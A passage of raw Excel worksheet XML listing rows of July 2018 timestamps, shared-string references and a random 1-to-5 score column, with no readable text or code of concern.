        <v>43299.200011574074</v>
      </c>
      <c r="C12450" t="s">
        <v>41</v>
      </c>
      <c r="E12450" t="s">
        <v>11162</v>
      </c>
      <c r="F12450">
        <f t="shared" ca="1" si="194"/>
        <v>2</v>
      </c>
    </row>
    <row r="12451" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12451" s="1">
        <v>43299.19189814815</v>
      </c>
      <c r="C12451" t="s">
        <v>10</v>
      </c>
      <c r="D12451" t="s">
        <v>6</v>
      </c>
      <c r="E12451" s="2" t="s">
        <v>6998</v>
      </c>
      <c r="F12451">
        <f t="shared" ca="1" si="194"/>
        <v>2</v>
      </c>
    </row>
    <row r="12452" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12452" s="1">
        <v>43299.175219907411</v>
      </c>
      <c r="C12452" t="s">
        <v>10735</v>
      </c>
      <c r="D12452" t="s">
        <v>112</v>
      </c>
      <c r="E12452" s="2" t="s">
        <v>11163</v>
      </c>
      <c r="F12452">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12453" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12453" s="1">
        <v>43299.143425925926</v>
      </c>
      <c r="C12453" t="s">
        <v>10</v>
      </c>
      <c r="D12453" t="s">
        <v>17</v>
      </c>
      <c r="E12453" s="2" t="s">
        <v>11164</v>
      </c>
      <c r="F12453">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12454" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12454" s="1">
        <v>43299.102847222224</v>
      </c>
      <c r="C12454" t="s">
        <v>140</v>
      </c>
      <c r="D12454" t="s">
        <v>234</v>
      </c>
      <c r="E12454" t="s">
        <v>11165</v>
      </c>
      <c r="F12454">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12455" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A12455" s="1">
        <v>43299.092372685183</v>
      </c>
      <c r="C12455" t="s">
        <v>140</v>
      </c>
      <c r="D12455" t="s">
        <v>234</v>
      </c>
      <c r="E12455" s="2" t="s">
        <v>11166</v>
      </c>
      <c r="F12455">
        <f t="shared" ca="1" si="194"/>
        <v>2</v>
      </c>
    </row>
    <row r="12456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12456" s="1">
        <v>43299.022974537038</v>
      </c>
      <c r="C12456" t="s">
        <v>41</v>
      </c>
      <c r="E12456" t="s">
        <v>11167</v>
      </c>
      <c r="F12456">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12457" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12457" s="1">
        <v>43299.015706018516</v>
      </c>
      <c r="C12457" t="s">
        <v>461</v>
      </c>
      <c r="D12457" t="s">
        <v>89</v>
      </c>
      <c r="E12457" s="2" t="s">
        <v>11168</v>
      </c>
      <c r="F12457">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12458" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12458" s="1">
        <v>43298.979201388887</v>
      </c>
      <c r="C12458" t="s">
        <v>139</v>
      </c>
      <c r="E12458" t="s">
        <v>11169</v>
      </c>
      <c r="F12458">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12459" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12459" s="1">
        <v>43298.95826388889</v>
      </c>
      <c r="C12459" t="s">
        <v>461</v>
      </c>
      <c r="D12459" t="s">
        <v>263</v>
      </c>
      <c r="E12459" s="2" t="s">
        <v>11170</v>
      </c>
      <c r="F12459">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12460" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12460" s="1">
        <v>43298.887280092589</v>
      </c>
      <c r="C12460" t="s">
        <v>73</v>
      </c>
      <c r="E12460" t="s">
        <v>11171</v>
      </c>
      <c r="F12460">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12461" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12461" s="1">
        <v>43298.859340277777</v>
      </c>
      <c r="C12461" t="s">
        <v>8588</v>
      </c>
      <c r="D12461" t="s">
        <v>36</v>
      </c>
      <c r="F12461">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12462" s="1">
        <v>43298.823321759257</v>
      </c>
      <c r="C12462" t="s">
        <v>319</v>
      </c>
      <c r="D12462" t="s">
        <v>885</v>
      </c>
      <c r="E12462" t="s">
        <v>10507</v>
      </c>
      <c r="F12462">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12463" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12463" s="1">
        <v>43298.805486111109</v>
      </c>
      <c r="C12463" t="s">
        <v>10</v>
      </c>
      <c r="D12463" t="s">
        <v>178</v>
      </c>
      <c r="F12463">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12464" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12464" s="1">
        <v>43298.789768518516</v>
      </c>
      <c r="C12464" t="s">
        <v>10</v>
      </c>
      <c r="D12464" t="s">
        <v>46</v>
      </c>
      <c r="E12464" t="s">
        <v>11172</v>
      </c>
      <c r="F12464">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12465" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12465" s="1">
        <v>43298.764189814814</v>
      </c>
      <c r="C12465" t="s">
        <v>7419</v>
      </c>
      <c r="D12465" t="s">
        <v>56</v>
      </c>
      <c r="E12465" s="2" t="s">
        <v>11173</v>
      </c>
      <c r="F12465">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12466" s="1">
        <v>43298.719722222224</v>
      </c>
      <c r="C12466" t="s">
        <v>222</v>
      </c>
      <c r="E12466" t="s">
        <v>11174</v>
      </c>
      <c r="F12466">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12467" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12467" s="1">
        <v>43298.708472222221</v>
      </c>
      <c r="C12467" t="s">
        <v>7419</v>
      </c>
      <c r="D12467" t="s">
        <v>112</v>
      </c>
      <c r="E12467" s="2" t="s">
        <v>11175</v>
      </c>
      <c r="F12467">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12468" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12468" s="1">
        <v>43298.707824074074</v>
      </c>
      <c r="C12468" t="s">
        <v>260</v>
      </c>
      <c r="E12468" s="2" t="s">
        <v>11176</v>
      </c>
      <c r="F12468">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12469" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12469" s="1">
        <v>43298.707731481481</v>
      </c>
      <c r="C12469" t="s">
        <v>10</v>
      </c>
      <c r="D12469" t="s">
        <v>178</v>
      </c>
      <c r="E12469" t="s">
        <v>11177</v>
      </c>
      <c r="F12469">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12470" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12470" s="1">
        <v>43298.707557870373</v>
      </c>
      <c r="C12470" t="s">
        <v>10</v>
      </c>
      <c r="D12470" t="s">
        <v>178</v>
      </c>
      <c r="E12470" t="s">
        <v>11177</v>
      </c>
      <c r="F12470">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12471" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12471" s="1">
        <v>43298.703460648147</v>
      </c>
      <c r="C12471" t="s">
        <v>260</v>
      </c>
      <c r="E12471" s="2" t="s">
        <v>11178</v>
      </c>
      <c r="F12471">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12472" s="1">
        <v>43298.702569444446</v>
      </c>
      <c r="C12472" t="s">
        <v>10</v>
      </c>
      <c r="D12472" t="s">
        <v>52</v>
      </c>
      <c r="E12472" t="s">
        <v>11179</v>
      </c>
      <c r="F12472">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12473" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A12473" s="1">
        <v>43298.694432870368</v>
      </c>
      <c r="C12473" t="s">
        <v>10</v>
      </c>
      <c r="D12473" t="s">
        <v>107</v>
      </c>
      <c r="E12473" s="2" t="s">
        <v>11180</v>
      </c>
      <c r="F12473">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12474" s="1">
        <v>43298.693611111114</v>
      </c>
      <c r="C12474" t="s">
        <v>10</v>
      </c>
      <c r="D12474" t="s">
        <v>178</v>
      </c>
      <c r="E12474" t="s">
        <v>11181</v>
      </c>
      <c r="F12474">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12475" s="1">
        <v>43298.656319444446</v>
      </c>
      <c r="C12475" t="s">
        <v>10</v>
      </c>
      <c r="D12475" t="s">
        <v>89</v>
      </c>
      <c r="E12475" t="s">
        <v>11182</v>
      </c>
      <c r="F12475">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12476" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12476" s="1">
        <v>43298.641921296294</v>
      </c>
      <c r="C12476" t="s">
        <v>6</v>
      </c>
      <c r="D12476" t="s">
        <v>114</v>
      </c>
      <c r="E12476" t="s">
        <v>11183</v>
      </c>
      <c r="F12476">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12477" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12477" s="1">
        <v>43298.637129629627</v>
      </c>
      <c r="C12477" t="s">
        <v>10</v>
      </c>
      <c r="D12477" t="s">
        <v>6</v>
      </c>
      <c r="E12477" s="2" t="s">
        <v>11184</v>
      </c>
      <c r="F12477">
        <f t="shared" ca="1" si="194"/>
        <v>5</v>
      </c>
    </row>
    <row r="12478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12478" s="1">
        <v>43298.630231481482</v>
      </c>
      <c r="C12478" t="s">
        <v>10</v>
      </c>
      <c r="D12478" t="s">
        <v>33</v>
      </c>
      <c r="E12478" t="s">
        <v>11185</v>
      </c>
      <c r="F12478">
        <f t="shared" ca="1" si="194"/>
        <v>1</v>
      </c>
    </row>
    <row r="12479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12479" s="1">
        <v>43298.628344907411</v>
      </c>
      <c r="C12479" t="s">
        <v>10</v>
      </c>
      <c r="D12479" t="s">
        <v>374</v>
      </c>
      <c r="E12479" t="s">
        <v>11186</v>
      </c>
      <c r="F12479">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12480" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12480" s="1">
        <v>43298.606226851851</v>
      </c>
      <c r="C12480" t="s">
        <v>10</v>
      </c>
      <c r="D12480" t="s">
        <v>17</v>
      </c>
      <c r="E12480" s="2" t="s">
        <v>11187</v>
      </c>
      <c r="F12480">
        <f t="shared" ca="1" si="194"/>
        <v>3</v>
      </c>
    </row>
    <row r="12481" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12481" s="1">
        <v>43298.590046296296</v>
      </c>
      <c r="C12481" t="s">
        <v>260</v>
      </c>
      <c r="E12481" s="2" t="s">
        <v>11188</v>
      </c>
      <c r="F12481">
        <f t="shared" ca="1" si="194"/>
        <v>4</v>
      </c>
    </row>
    <row r="12482" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12482" s="1">
        <v>43298.573692129627</v>
      </c>
      <c r="C12482" t="s">
        <v>10</v>
      </c>
      <c r="D12482" t="s">
        <v>158</v>
      </c>
      <c r="E12482" t="s">
        <v>11189</v>
      </c>
      <c r="F12482">
        <f t="shared" ref="F12482:F12545" ca="1" si="195">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="12483" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12483" s="1">
        <v>43298.572106481479</v>
      </c>
      <c r="C12483" t="s">
        <v>10</v>
      </c>
      <c r="D12483" t="s">
        <v>163</v>
      </c>
      <c r="E12483" t="s">
        <v>11190</v>
      </c>
      <c r="F12483">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12484" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12484" s="1">
        <v>43298.559733796297</v>
      </c>
      <c r="C12484" t="s">
        <v>16</v>
      </c>
      <c r="E12484" s="2" t="s">
        <v>11191</v>
      </c>
      <c r="F12484">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12485" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12485" s="1">
        <v>43298.508229166669</v>
      </c>
      <c r="C12485" t="s">
        <v>6</v>
      </c>
      <c r="D12485" t="s">
        <v>25</v>
      </c>
      <c r="E12485" t="s">
        <v>11192</v>
      </c>
      <c r="F12485">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12486" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12486" s="1">
        <v>43298.497384259259</v>
      </c>
      <c r="C12486" t="s">
        <v>10</v>
      </c>
      <c r="D12486" t="s">
        <v>36</v>
      </c>
      <c r="E12486" t="s">
        <v>11193</v>
      </c>
      <c r="F12486">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12487" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12487" s="1">
        <v>43298.496539351851</v>
      </c>
      <c r="C12487" t="s">
        <v>10</v>
      </c>
      <c r="D12487" t="s">
        <v>89</v>
      </c>
      <c r="E12487" t="s">
        <v>11194</v>
      </c>
      <c r="F12487">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12488" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12488" s="1">
        <v>43298.469699074078</v>
      </c>
      <c r="C12488" t="s">
        <v>10</v>
      </c>
      <c r="D12488" t="s">
        <v>80</v>
      </c>
      <c r="E12488" t="s">
        <v>11195</v>
      </c>
      <c r="F12488">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12489" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12489" s="1">
        <v>43298.436851851853</v>
      </c>
      <c r="C12489" t="s">
        <v>408</v>
      </c>
      <c r="E12489" t="s">
        <v>11196</v>
      </c>
      <c r="F12489">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12490" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12490" s="1">
        <v>43298.433298611111</v>
      </c>
      <c r="C12490" t="s">
        <v>71</v>
      </c>
      <c r="E12490" s="2" t="s">
        <v>11197</v>
      </c>
      <c r="F12490">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12491" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12491" s="1">
        <v>43298.423993055556</v>
      </c>
      <c r="C12491" t="s">
        <v>10</v>
      </c>
      <c r="D12491" t="s">
        <v>89</v>
      </c>
      <c r="E12491" s="2" t="s">
        <v>11198</v>
      </c>
      <c r="F12491">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12492" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12492" s="1">
        <v>43298.421898148146</v>
      </c>
      <c r="C12492" t="s">
        <v>2192</v>
      </c>
      <c r="D12492" t="s">
        <v>7</v>
      </c>
      <c r="E12492" s="2" t="s">
        <v>11199</v>
      </c>
      <c r="F12492">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12493" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12493" s="1">
        <v>43298.406990740739</v>
      </c>
      <c r="C12493" t="s">
        <v>10</v>
      </c>
      <c r="D12493" t="s">
        <v>89</v>
      </c>
      <c r="E12493" t="s">
        <v>11200</v>
      </c>
      <c r="F12493">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12494" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12494" s="1">
        <v>43298.359479166669</v>
      </c>
      <c r="C12494" t="s">
        <v>10</v>
      </c>
      <c r="D12494" t="s">
        <v>178</v>
      </c>
      <c r="E12494" s="2" t="s">
        <v>11201</v>
      </c>
      <c r="F12494">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12495" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12495" s="1">
        <v>43298.352268518516</v>
      </c>
      <c r="C12495" t="s">
        <v>48</v>
      </c>
      <c r="D12495" t="s">
        <v>312</v>
      </c>
      <c r="E12495" s="2" t="s">
        <v>11202</v>
      </c>
      <c r="F12495">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12496" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12496" s="1">
        <v>43298.329710648148</v>
      </c>
      <c r="C12496" t="s">
        <v>314</v>
      </c>
      <c r="E12496" s="2" t="s">
        <v>11203</v>
      </c>
      <c r="F12496">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12497" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12497" s="1">
        <v>43298.273263888892</v>
      </c>
      <c r="C12497" t="s">
        <v>6</v>
      </c>
      <c r="D12497" t="s">
        <v>25</v>
      </c>
      <c r="E12497" s="2" t="s">
        <v>11204</v>
      </c>
      <c r="F12497">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12498" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12498" s="1">
        <v>43298.235717592594</v>
      </c>
      <c r="C12498" t="s">
        <v>253</v>
      </c>
      <c r="E12498" t="s">
        <v>11205</v>
      </c>
      <c r="F12498">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12499" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12499" s="1">
        <v>43298.166620370372</v>
      </c>
      <c r="C12499" t="s">
        <v>48</v>
      </c>
      <c r="E12499" t="s">
        <v>11206</v>
      </c>
      <c r="F12499">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12500" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A12500" s="1">
        <v>43298.114722222221</v>
      </c>
      <c r="C12500" t="s">
        <v>65</v>
      </c>
      <c r="E12500" s="2" t="s">
        <v>11207</v>
      </c>
      <c r="F12500">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12501" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12501" s="1">
        <v>43297.978935185187</v>
      </c>
      <c r="C12501" t="s">
        <v>73</v>
      </c>
      <c r="E12501" t="s">
        <v>11208</v>
      </c>
      <c r="F12501">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12502" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12502" s="1">
        <v>43297.869456018518</v>
      </c>
      <c r="C12502" t="s">
        <v>17</v>
      </c>
      <c r="E12502" s="2" t="s">
        <v>11209</v>
      </c>
      <c r="F12502">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12503" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12503" s="1">
        <v>43297.833541666667</v>
      </c>
      <c r="C12503" t="s">
        <v>140</v>
      </c>
      <c r="D12503" t="s">
        <v>234</v>
      </c>
      <c r="E12503" t="s">
        <v>11210</v>
      </c>
      <c r="F12503">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12504" spans="1:6" ht="345" x14ac:dyDescent="0.25">
      <c r="A12504" s="1">
        <v>43297.829641203702</v>
      </c>
      <c r="C12504" t="s">
        <v>292</v>
      </c>
      <c r="D12504" t="s">
        <v>6</v>
      </c>
      <c r="E12504" s="2" t="s">
        <v>11211</v>
      </c>
      <c r="F12504">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12505" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A12505" s="1">
        <v>43297.829409722224</v>
      </c>
      <c r="C12505" t="s">
        <v>260</v>
      </c>
      <c r="E12505" s="2" t="s">
        <v>11212</v>
      </c>
      <c r="F12505">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12506" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12506" s="1">
        <v>43297.82917824074</v>
      </c>
      <c r="C12506" t="s">
        <v>144</v>
      </c>
      <c r="E12506" s="2" t="s">
        <v>11213</v>
      </c>
      <c r="F12506">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12507" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12507" s="1">
        <v>43297.742118055554</v>
      </c>
      <c r="C12507" t="s">
        <v>10</v>
      </c>
      <c r="D12507" t="s">
        <v>14</v>
      </c>
      <c r="E12507" t="s">
        <v>11214</v>
      </c>
      <c r="F12507">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12508" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12508" s="1">
        <v>43297.729513888888</v>
      </c>
      <c r="C12508" t="s">
        <v>6</v>
      </c>
      <c r="D12508" t="s">
        <v>821</v>
      </c>
      <c r="E12508" s="2" t="s">
        <v>11215</v>
      </c>
      <c r="F12508">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12509" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12509" s="1">
        <v>43297.729050925926</v>
      </c>
      <c r="C12509" t="s">
        <v>10</v>
      </c>
      <c r="D12509" t="s">
        <v>244</v>
      </c>
      <c r="E12509" s="2" t="s">
        <v>11216</v>
      </c>
      <c r="F12509">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12510" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12510" s="1">
        <v>43297.690011574072</v>
      </c>
      <c r="C12510" t="s">
        <v>1325</v>
      </c>
      <c r="E12510" t="s">
        <v>11217</v>
      </c>
      <c r="F12510">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12511" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12511" s="1">
        <v>43297.6171412037</v>
      </c>
      <c r="C12511" t="s">
        <v>10</v>
      </c>
      <c r="E12511" t="s">
        <v>11218</v>
      </c>
      <c r="F12511">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12512" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12512" s="1">
        <v>43297.611597222225</v>
      </c>
      <c r="C12512" t="s">
        <v>344</v>
      </c>
      <c r="E12512" t="s">
        <v>11219</v>
      </c>
      <c r="F12512">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12513" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12513" s="1">
        <v>43297.596446759257</v>
      </c>
      <c r="C12513" t="s">
        <v>48</v>
      </c>
      <c r="E12513" t="s">
        <v>11220</v>
      </c>
      <c r="F12513">
        <f t="shared" ca="1" si="195"/>
        <v>2</v>
      </c>
    </row>
    <row r="12514" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12514" s="1">
        <v>43297.593310185184</v>
      </c>
      <c r="C12514" t="s">
        <v>9609</v>
      </c>
      <c r="D12514" t="s">
        <v>46</v>
      </c>
      <c r="E12514" t="s">
        <v>10507</v>
      </c>
      <c r="F12514">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12515" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12515" s="1">
        <v>43297.590532407405</v>
      </c>
      <c r="C12515" t="s">
        <v>318</v>
      </c>
      <c r="D12515" t="s">
        <v>244</v>
      </c>
      <c r="E12515" t="s">
        <v>10507</v>
      </c>
      <c r="F12515">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12516" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A12516" s="1">
        <v>43297.572997685187</v>
      </c>
      <c r="C12516" t="s">
        <v>10</v>
      </c>
      <c r="D12516" t="s">
        <v>36</v>
      </c>
      <c r="E12516" s="2" t="s">
        <v>11221</v>
      </c>
      <c r="F12516">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12517" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12517" s="1">
        <v>43297.567418981482</v>
      </c>
      <c r="C12517" t="s">
        <v>4879</v>
      </c>
      <c r="D12517" t="s">
        <v>750</v>
      </c>
      <c r="E12517" t="s">
        <v>11156</v>
      </c>
      <c r="F12517">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12518" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12518" s="1">
        <v>43297.563807870371</v>
      </c>
      <c r="C12518" t="s">
        <v>10</v>
      </c>
      <c r="D12518" t="s">
        <v>94</v>
      </c>
      <c r="E12518" s="2" t="s">
        <v>11222</v>
      </c>
      <c r="F12518">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12519" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A12519" s="1">
        <v>43297.542060185187</v>
      </c>
      <c r="C12519" t="s">
        <v>10</v>
      </c>
      <c r="D12519" t="s">
        <v>6</v>
      </c>
      <c r="E12519" s="2" t="s">
        <v>11223</v>
      </c>
      <c r="F12519">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12520" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A12520" s="1">
        <v>43297.536932870367</v>
      </c>
      <c r="C12520" t="s">
        <v>10</v>
      </c>
      <c r="D12520" t="s">
        <v>56</v>
      </c>
      <c r="E12520" s="2" t="s">
        <v>11224</v>
      </c>
      <c r="F12520">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12521" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12521" s="1">
        <v>43297.536516203705</v>
      </c>
      <c r="C12521" t="s">
        <v>10</v>
      </c>
      <c r="D12521" t="s">
        <v>367</v>
      </c>
      <c r="F12521">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12522" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A12522" s="1">
        <v>43297.527824074074</v>
      </c>
      <c r="C12522" t="s">
        <v>3049</v>
      </c>
      <c r="E12522" s="2" t="s">
        <v>4049</v>
      </c>
      <c r="F12522">
        <f t="shared" ca="1" si="195"/>
        <v>4</v>
      </c>
    </row>
    <row r="12523" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12523" s="1">
        <v>43297.519780092596</v>
      </c>
      <c r="C12523" t="s">
        <v>10</v>
      </c>
      <c r="D12523" t="s">
        <v>163</v>
      </c>
      <c r="E12523" t="s">
        <v>11225</v>
      </c>
      <c r="F12523">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12524" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12524" s="1">
        <v>43297.499293981484</v>
      </c>
      <c r="C12524" t="s">
        <v>48</v>
      </c>
      <c r="E12524" t="s">
        <v>11226</v>
      </c>
      <c r="F12524">
        <f t="shared" ca="1" si="195"/>
        <v>5</v>
      </c>
    </row>
    <row r="12525" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A12525" s="1">
        <v>43297.492951388886</v>
      </c>
      <c r="C12525" t="s">
        <v>10</v>
      </c>
      <c r="D12525" t="s">
        <v>222</v>
      </c>
      <c r="E12525" t="s">
        <v>11227</v>
      </c>
      <c r="F12525">
        <f t="shared" ca="1" si="195"/>
        <v>3</v>
      </c>
    </row>
    <row r="12526" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A12526" s="1">
        <v>43297.491388888891</v>
      </c>
      <c r="C12526" t="s">
        <v>10</v>
      </c>
      <c r="D12526" t="s">
        <v>89</v>
      </c>
      <c r="E12526" s="2" t="s">
        <v>11228</v>
      </c>
      <c r="F12526">
        <f t="shared" ca="1" si="195"/>
        <v>1</v>
      </c>
    </row>
    <row r="12527" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A12527" s="1">
        <v>43297.489872685182</v>
      </c>
      <c r="C12527" t="s">
        <v>10375</v>
      </c>
      <c r="D12527" t="s">
        <v>52</v>
      </c>
      <c r="E12527" s="2" t="s">
        <v>11229</v>
